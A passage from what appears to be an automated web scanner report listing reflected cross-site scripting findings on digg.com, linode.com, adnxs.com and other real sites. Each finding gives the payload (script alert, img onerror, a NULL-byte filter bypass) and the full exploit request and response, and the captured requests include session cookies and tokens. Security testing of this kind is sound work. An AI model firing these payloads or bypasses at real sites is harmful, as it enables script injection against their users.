X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Tue, 19 Jul 2011 20:20:26 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<script language='javascript'>var theform = document.forms[0];theform.action = '/index.aspx?puid=DDB9EA26-95E8-4243-A47C-5AA8728ABE46&72398';alert(1)//453a224832a=1';</script>
...[SNIP]...

4.103. http://digg.com/ajax/tooltip/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /ajax/tooltip/submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003d472"><script>alert(1)</script>dd8bfeb6e79 was submitted in the REST URL parameter 1. This input was echoed as 3d472"><script>alert(1)</script>dd8bfeb6e79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ajax%003d472"><script>alert(1)</script>dd8bfeb6e79/tooltip/submit?token=1311085708_f512e3f19fa7c46ecf738ea5b1e8e413d5d3afb12cbdfbb1323de756ece723b2 HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
Referer: http://digg.com/submit?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2; traffic_control=f041000000601100001689866400%3A221%3A112; __utma=146621099.1841421009.1311085718.1311085718.1311085718.1; __utmb=146621099.1.10.1311085718; __utmc=146621099; __utmz=146621099.1311085718.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=146621099.|1=Tests=%2C115%3DN%2C122%3DN%2C164%3DN%2C214%3DN%2C220%3DN=1,2=Users=f%3DN%2Ct%3DN%2Cu%3D_=1; s_cc=true; s_ria=flash%2010%7Csilverlight%20not%20detected; undefined_s=First%20Visit; s_nr=1311085718020; s_vnum=1313677718021%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:43 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=696877 10.2.130.24
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18423

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/ajax%003d472"><script>alert(1)</script>dd8bfeb6e79/tooltip/submit?token=1311085708_f512e3f19fa7c46ecf738ea5b1e8e413d5d3afb12cbdfbb1323de756ece723b2.rss">
...[SNIP]...

4.104. http://digg.com/ajax/tooltip/submit [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /ajax/tooltip/submit

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %003f18c"><script>alert(1)</script>987b09908e7 was submitted in the REST URL parameter 2. This input was echoed as 3f18c"><script>alert(1)</script>987b09908e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ajax/tooltip%003f18c"><script>alert(1)</script>987b09908e7/submit?token=1311085708_f512e3f19fa7c46ecf738ea5b1e8e413d5d3afb12cbdfbb1323de756ece723b2 HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
Referer: http://digg.com/submit?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2; traffic_control=f041000000601100001689866400%3A221%3A112; __utma=146621099.1841421009.1311085718.1311085718.1311085718.1; __utmb=146621099.1.10.1311085718; __utmc=146621099; __utmz=146621099.1311085718.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmv=146621099.|1=Tests=%2C115%3DN%2C122%3DN%2C164%3DN%2C214%3DN%2C220%3DN=1,2=Users=f%3DN%2Ct%3DN%2Cu%3D_=1; s_cc=true; s_ria=flash%2010%7Csilverlight%20not%20detected; undefined_s=First%20Visit; s_nr=1311085718020; s_vnum=1313677718021%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:28:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=421321 10.2.129.226
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18431

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/ajax/tooltip%003f18c"><script>alert(1)</script>987b09908e7/submit?token=1311085708_f512e3f19fa7c46ecf738ea5b1e8e413d5d3afb12cbdfbb1323de756ece723b2.rss">
...[SNIP]...

4.105. http://digg.com/submit [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://digg.com
Path:   /submit

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c7d7a"><script>alert(1)</script>f1be7ad2499 was submitted in the REST URL parameter 1. This input was echoed as c7d7a"><script>alert(1)</script>f1be7ad2499 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /submit%00c7d7a"><script>alert(1)</script>f1be7ad2499?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems HTTP/1.1
Host: digg.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: d=85df7d9bad8e8d89082fa2e639823b583fe18ba49cd23f778d390a8b56dda4a2

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:30:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
X-Digg-Time: D=708118 10.2.129.49
Cache-Control: no-cache,no-store,must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 18628

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>error_ - Digg</title>

<meta name="keywords" content="Digg, pictures, breaking news, entertainment, politics, technology
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Digg" href="/submit%00c7d7a"><script>alert(1)</script>f1be7ad2499?phase=2&url=http%3A%2F%2Fwww.factset.com%2Fproducts%2Fprivateequity&title=Private+Equity%2C+Venture+Capital%2C+Ownership%2C+M%26A%2C+Idea+Screening%2C+Reporting+%7C+FactSet+Research+Systems.rss">
...[SNIP]...

4.106. http://ib.adnxs.com/ptj [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95946'%3balert(1)//6711be401d1 was submitted in the redir parameter. This input was echoed as 95946';alert(1)//6711be401d1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=311&inv_code=cm.quadbostonglobe&size=160x600&imp_id=cm-10210473643_1311108278,11fda490648f83c&referrer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.quadbostonglobe%2F%3Bnet%3Dcm%3Bu%3D%2Ccm-10210473643_1311108278%2C11fda490648f83c%2Cnone%2Cax.{PRICEBUCKET}-bz.25%3B%3Bcmw%3Dnowl%3Bsz%3D160x600%3Bnet%3Dcm%3Benv%3Difr%3Bord1%3D551186%3Bcontx%3Dnone%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dbz.25%3Bord%3D1311108273%3F95946'%3balert(1)//6711be401d1 HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/160x600/bg_1064637_61606216?t=1311108279704&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: uuid2=7212282717808390200; icu=ChII7sICEAoYBSAFKAUwyI2S8QQQyI2S8QQYBA..; anj=Kfu=8fG7DHE:3F.0s]#%2L_'x%SEV/i#-$J!z6Wr8RXhl)=m!YD2*h.g<ASP%TqwW#(tx$%c]+McvegUoTV'oPd[_vD%r8FgFSHuwr$Ygv>tkv%vnG*+/ld?coMiZ:c5aFt+j:v+B<AT4Aln*Pf@3^46@UrC?Y]+7D^**il8bz2s<KI0ORCT`QuHy$RXj1t$rf+]M^>^=:_e78ohgMdtT_1oWnca.tK[`wf@!9hU[0st)EmB'#Kw(w$W)P^c6C:(D).g=JU?3$q5Q.c4O!PMqMu@7XRqQ<cVQ@; sess=1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 20:47:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=7212282717808390200; path=/; expires=Mon, 17-Oct-2011 20:47:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb865736=; path=/; expires=Fri, 01-Jan-1980 00:00:00 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChII1LEDEAoYAiACKAIw1NqX8QQQ1NqX8QQYAQ..; path=/; expires=Mon, 17-Oct-2011 20:47:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb887655=5_[r^XI()v4FMSZKU:cHSV7Bm?enc=-FJ40Oy69z_ffZ-7blv1PwAAAEAzMwtA332fu25b9T_4UnjQ7Lr3PwIbxuWVHrQBOHCoZussF2RU7SVOAAAAAPcqCAA3AQAANQEAAAIAAACeyAcADSwBAAEAAABVU0QAVVNEAKAAWAKqKwAAzw8BAgUCAQUAAAAANiXwrwAAAAA.&tt_code=cm.quadbostonglobe&udj=uf%28%27a%27%2C+21322%2C+1311108436%29%3Buf%28%27r%27%2C+510110%2C+1311108436%29%3Bppv%2815053%2C+%27122756718999771906%27%2C+1311108436%2C+1316292436%2C+98060%2C+76813%29%3B&cnd=!niawKQiM_gUQnpEfGAAgjdgEMAA4qldAAEi1AlD31SBYAGDIAWgAcAJ4BIABAogBBJABAZgBAaABAagBA7ABALkBiKm88Oy69z_BAYipvPDsuvc_yQG0jpyV-OrbP9kBAAAAAAAA8D_gAQA.&ccd=!lwRFJgiM_gUQnpEfGI3YBCAA; path=/; expires=Wed, 20-Jul-2011 20:47:16 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG2<rfQCe7?0P(*AuB-u**g1:XIBOG#yJ1hN)-R^0:8p7d!oK7UWL+#*K-$4$/nr%*K>4vNYxP0fQ4ob(Q)FrcgD>gUlpmowPR5St#!Oq*raj24<^IXNgeZ:R-z9hotxFq4D7U+E_^a2(TIGAEI]-hbvK>4L(R22Za2CHlx6yu$EFe*$y5PR+)i%[.ce9um'8$YSQ?l[3<O/+Jyyl*!W]1M`Nuw(8=Lnb-ndK:'oSJZT8lllP')@cvPhg!7gtG3TDqleDjk<On>r#%Ncs!)NZ^B/Cy2)G90+:usmpN$w86RUq5cwb?6Z'a; path=/; expires=Mon, 17-Oct-2011 20:47:16 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Tue, 19 Jul 2011 20:47:16 GMT
Content-Length: 414

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.quadbostonglobe/;net=cm;u=,cm-10210473643_1311108278,11fda490648f83c,none,ax.120-bz.25;;cmw=nowl;sz=160x600;net=cm;env=ifr;ord1=551186;contx=none;an=120;dc=w;btg=bz.25;ord=1311108273?95946';alert(1)//6711be401d1">
...[SNIP]...

4.107. http://image.providesupport.com/cmd/versionone [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://image.providesupport.com
Path:   /cmd/versionone

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bea88<script>alert(1)</script>40eaaf49c7e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /cmdbea88<script>alert(1)</script>40eaaf49c7e/versionone?ps_t=1311085407790&ps_l=http%3A//www.versionone.com/Product/&ps_r=http%3A//pm.versionone.com/AgilePoster.html%3Fc-aws%3Daps%26gr-apss%26v-010%26gclid%3DCNf6xcPNjaoCFcTe4AodVQ6rzQ&ps_s=md4i0utLDDtg HTTP/1.1
Host: image.providesupport.com
Proxy-Connection: keep-alive
Referer: http://www.versionone.com/Product/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vsid=md4i0utLDDtg

Response

HTTP/1.1 404 Not Found
Content-Type: text/html
Cache-Control: no-cache
Pragma: no-cache
Connection: close
Date: Tue, 19 Jul 2011 14:23:21 GMT
Content-Length: 579

<html>
<body>
<h2>Error 404: Not Found</h2>
<pre>
File: /cmdbea88<script>alert(1)</script>40eaaf49c7e/versionone?ps_t=1311085407790&ps_l=http://www.versionone.com/Product/&ps_r=http://pm.versionone.com/AgilePoster.html?c-aws=aps&gr-apss&v-010&gclid=CNf6xcPNjaoCFcTe4AodVQ6rzQ&ps_s=md4i0utLDDtg
</pre>
...[SNIP]...

4.108. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 405ea<script>alert(1)</script>c1eda980f6d was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=C07583405ea<script>alert(1)</script>c1eda980f6d&auto=t HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.gamestop.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_K08784=82f4957c1a652091&K08784&0&4e39547c&0&&4e140790&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J08781=82f4957c1a652091&J08781&0&4e3abd4a&0&&4e153a78&1f1a384c105a2f365a2b2d6af5f27c36; udm_0=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; rsi_segs_1000000=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; rtc_gxm3=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; rsiPus_kpxr="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"; rsi_us_1000000="pUMV4ilDMIYVro/ikx0KzFTj+PdvjRT6ZWaNShYdEeUFrQxHwyMpN1rqGnQRFqa+S/25F36vD/K2JHqbAnH0QgNwBcu+xjfRUt71TzR3VARm14WJneK7F1Fl5EG7hmytolo9yu7iqbvp9O30jBTlsVDglkAW/N0HoFS7lrwuKmlcXO5RnxW/FpYas6guLqyU1VP0fgCPupcrhstDdQcnXlYEU3TZHyFJMkgpH9flr6TqmeTIey5PMNiQudi4NPqJZnmzRJp62T8KsVtaoPw+4TQ5ur68KzNOS28Vxrv6VFyWgMTSglDH/4ZGjWIjh06OqLdj6PjytXEZI7/47k9vQnHfpYP6mzRp79L8PJB8gssFocqOBJxgF/yXgtMt0CUaG2XJA7ZyYhr9yjDFO7zcr5vU4kRvEbe9eMzuC7ODERjeovwaWNHAc9voQt5QLKA/P6CtAJhwoh8cp3W5nRCa5h+Kxu6QvRl6fKJYa8GTAcp/XFNS13yyW+YVfVcDQ4A0tVPZp0CnNrFHoHNbzTeEQXAGthF+wehNumlWvAdYeIUc99vZrjnz47gHaA8KfvYs1DzpJUtJXuioPCshXywbGZXAItrKisst96/+1I9ggKMcMw8pNJd8giwdpin2RovJ/KyjZhlLC9jmC/3xPYuEzQHjAMxE13QJVlRWlZ7TTf+UKexS7QvkM0n9aT9Z4MxozrrR6+CwohbbSsfllXx6YlaRufejyyILgx88i6MpftURcuBtDrQh9ds6sr89Q6vZCPDMT09g44na9X5YWUc1n4kYm6KIdV9gLK1ntCoF5XQQgairyR+6aW0x8j8oEoa8v+8YF9UGIos2gxSjwp4NHLhPfwt2PtRsMGJjMEEZx2E3damoXCofW1eLBaom5a0q7JKxuY8Vqud/bpfCd8iLl9h9L38v5iJrOYy6/TpWrlFbshPMOU6Q8fYzJLhwoAWjyy3aD7fM5qDD6vkj/CKd2hLanSRNixPGycCMKxwJyDFJmGEN1qaZhCzw2Oo10QddAw8UDpDk5Z9mG+x93n/qhyvAfo9m9YZqq3TMGusykxptTJ5YzyI/YlixkY6IcBsDIZA3lO8oqzD+NDV6FA23GOCtNeTuygGJQT2NklRh0WTvUdrBGxhdKq6MIRqH6Z6vmSstqWU8JlqmKv9Mpld4JO4quyO5E1x81J6tFhoz02qnZT+9CrqmcOxFKus3LyBszdmpcsGqqdo8v0DVoaApSiCPKfrUOvPOttBzs75pKiv2ZZIz+ro
NUUfN2wG/xr66U6CVdAf5NFNtcTCNl5EsHkUlnHBtEpy7jMd3PqQpdVbyhCPrHc+yjfCtl0NvwHseEwipbkiA8lpTs1P2HaNXrQrn3hOT9k4i5alBdgwkL+AJ+AKfzRZJ0+evXmLv4bZnWMuy12p+7dVHkHEYsBMBj8lLkeeF45mYbqaJkPlrAQYFhQr3hJUqAYjQbRAOtSUdIQzLKN+Dsxyb14QcPrkJP5x+yU2ln27yWBxhxD3EZdeKXavQyII7tmlRVEFNg8fL/UvHE8Po5Az2wwSQw9p5ykXzXd6oQzeqkE6ulGDIBZXasEj/HKEsZInx3zLzEdqUPXlbaYmGq8vCPXrHY3MrtU0j+Ot4sIH2bV5ST8uO8sKhrffUc9zAJDWp9Td57AqE2XM2JJodGQEcT9qj5CdyCaUy5CFvWpeKR6NZChYRdUe1VhBHqvpAUuXI5+OksjNLASv2gljDCH/86fdDTRIZ86/Ywie9+EkqD/IqTMw1Fy9viFb1zLLKJQ5ym/tNQy8rK1zajO/dfc5gDUeNGDVKnHV/D0CTGlUqVmb0Iz1L/9UACYTzVibMQjj1NJRC/1omsUu9lAB9Dc6tgUEICxHD9sfQ3o3BQu/I6chgQagGvEexh0/C4rsqGS//22odQ0EPx5WuDKOGI9To0hSqu0TcDdNm8c5GBdzU5riw4cBVUVG8YVE6/I0IdYXIq1gWTPOZOkfn6Kc45yqJI5gPy8UB4yNOM8Ff+iTACg=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Tue, 19 Jul 2011 16:02:28 GMT
Cache-Control: max-age=86400, private
Expires: Wed, 20 Jul 2011 16:02:28 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Tue, 19 Jul 2011 16:02:28 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "C07583405EA<SCRIPT>ALERT(1)</SCRIPT>C1EDA980F6D" was not recognized.
*/

4.109. https://manager.linode.com/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://manager.linode.com
Path:   /session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3fdf"><img%20src%3da%20onerror%3dalert(1)>5eef32d9c21 was submitted in the REST URL parameter 3. This input was echoed as f3fdf"><img src=a onerror=alert(1)>5eef32d9c21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /session/forgot_save/f3fdf"><img%20src%3da%20onerror%3dalert(1)>5eef32d9c21=N%20onerror=netsparker(9)%3E HTTP/1.1
Host: manager.linode.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 19 Jul 2011 18:05:24 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 2701


<html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<title>I Forgot</title>
<link rel="stylesh
...[SNIP]...
<form name="forgot_save" id="forgot_save" action="/session/forgot_save/f3fdf"><img src=a onerror=alert(1)>5eef32d9c21=N onerror=netsparker(9)>
...[SNIP]...

4.110. https://manager.linode.com/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://manager.linode.com
Path:   /session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E

Issue detail

The value of REST URL parameter 3 is copied into the name of an HTML tag attribute. The payload 675ff><img%20src%3da%20onerror%3dalert(1)>299ae41ef58 was submitted in the REST URL parameter 3. This input was echoed as 675ff><img src=a onerror=alert(1)>299ae41ef58 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /session/forgot_save/%22%3E%3CiMg%20src675ff><img%20src%3da%20onerror%3dalert(1)>299ae41ef58=N%20onerror=netsparker(9)%3E HTTP/1.1
Host: manager.linode.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 19 Jul 2011 18:05:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 2710


<html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<title>I Forgot</title>
<link rel="stylesh
...[SNIP]...
<iMg src675ff><img src=a onerror=alert(1)>299ae41ef58=N onerror=netsparker(9)>
...[SNIP]...

4.111. https://manager.linode.com/session/forgot_save/N [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   https://manager.linode.com
Path:   /session/forgot_save/N

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fb26"><img%20src%3da%20onerror%3dalert(1)>12901bad508 was submitted in the REST URL parameter 3. This input was echoed as 3fb26"><img src=a onerror=alert(1)>12901bad508 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /session/forgot_save/N3fb26"><img%20src%3da%20onerror%3dalert(1)>12901bad508 HTTP/1.1
Host: manager.linode.com
Connection: keep-alive
Referer: https://manager.linode.com/session/forgot_save/%22%3E%3CiMg%20src=N%20onerror=netsparker(9)%3E
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 19 Jul 2011 18:05:22 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Content-Length: 2677


<html>
<head><script type="text/javascript" src="/CFIDE/scripts/cfform.js"></script>
<script type="text/javascript" src="/CFIDE/scripts/masks.js"></script>

<title>I Forgot</title>
<link rel="stylesh
...[SNIP]...
<form name="forgot_save" id="forgot_save" action="/session/forgot_save/N3fb26"><img src=a onerror=alert(1)>12901bad508" method="post" onsubmit="return _CF_checkforgot_save(this)">
...[SNIP]...

4.112. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95a30'%3balert(1)//7d4e8305cf was submitted in the admeld_callback parameter. This input was echoed as 95a30';alert(1)//7d4e8305cf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

